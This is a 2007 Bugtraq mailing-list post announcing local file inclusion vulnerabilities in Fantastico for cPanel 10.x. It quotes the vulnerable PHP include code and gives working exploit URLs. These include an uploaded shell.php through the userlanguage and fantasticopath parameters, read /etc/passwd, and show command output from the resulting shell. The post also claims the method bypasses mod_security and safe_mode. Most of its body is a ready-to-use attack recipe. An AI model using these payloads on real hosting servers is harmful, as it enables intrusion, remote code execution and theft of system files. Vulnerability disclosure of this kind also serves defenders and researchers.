Fantastico In all Version Cpanel 10.x <= local File Include
- To: submit@xxxxxxxxxxx
- Subject: Fantastico In all Version Cpanel 10.x <= local File Include
- From: "z3r0 z3r0.2.z3r0" <z3r0.2.z3r0@xxxxxxxxx>
- Date: Sun, 11 Mar 2007 10:21:53 -0800
- Cc: bugtraq@xxxxxxxxxxxxxxxxx
- Dkim-signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:cc:mime-version:content-type:content-transfer-encoding:content-disposition; b=VhqN8De8EE7aG81By8GaMMjucZw4SgqtzvascQLzpQl1T95ZWRi4z9nJbXTIom9bKts26NaOb/0PrU1FpqJ/R6zsT+VDPKqKP7wYoz8r7gI/fBgILrfs6mixCD61rEraSMAC5oMkBgZONkqNPHqKaijmwam9CPj2nDRGgtYKsKA=
- Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:cc:mime-version:content-type:content-transfer-encoding:content-disposition; b=s3fwCtB5SLju7DRFzPX75v1HelEAs7/bzYpQNwpzEUUnif1oKCSGcAO06/ovruDx3JZmYziWQ1YLFvyq8Em3xQVLkDHK0X3vHx1Q6hZEOrrxX0FGaaORXI19UJMxb33M4pQmi26hnYM1Nwl5Tclqg2vL6V3rQndoKl/vygnD9Bs=
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
##############################################################
Fantastico In all Version Cpanel 10.x <= local File Include
##############################################################to the
Note : Preparations php.ini in Cpanel hypothetical and They also in
all WebServer
Must provide username And pass and login :2082
To break the strongest protection mod_security & safe_mode:On &
Disable functions : All NONE
Vulnerable Code ( 1 ) :
if(is_file($userlanguage))
{
include ( $userlanguage );
In
http://xx.com:2082/frontend/x/fantastico/includes/load_language.php
Exploit 1 :
http://xx.com:2082/frontend/x/fantastico/includes/load_language.php?userlanguage=/home/user/shell.php
id
uid=32170(user) gid=32170(user) groups=32170(user)
Exploit 2 :
http://xx.com:2082/frontend/x/fantastico/includes/load_language.php?userlanguage=/etc/passwd
###################################################
Vulnerable Code ( 2 ) :
$localmysqlconfig=$fantasticopath . "/includes/mysqlconfig.local.php";
if (is_file($localmysqlconfig))
{
include($localmysqlconfig);
in
http://xx.com:2082/frontend/x/fantastico/includes/mysqlconfig.php
And also many of the files of the program
Exploit :
First Create directory Let the name (/includes/)
and upload Shell.php in (/includes/) Then rename
mysqlconfig.local.php D:
:::xploit::::
http://xx.com:2082/frontend/x/fantastico/includes/mysqlconfig.php?fantasticopath=/home/user/
###################################################
Discoverd By : cyb3rt & 020
###################################################
Special Greetings :_ Tryag-Team & 4lKaSrGoLd3n-Team
###################################################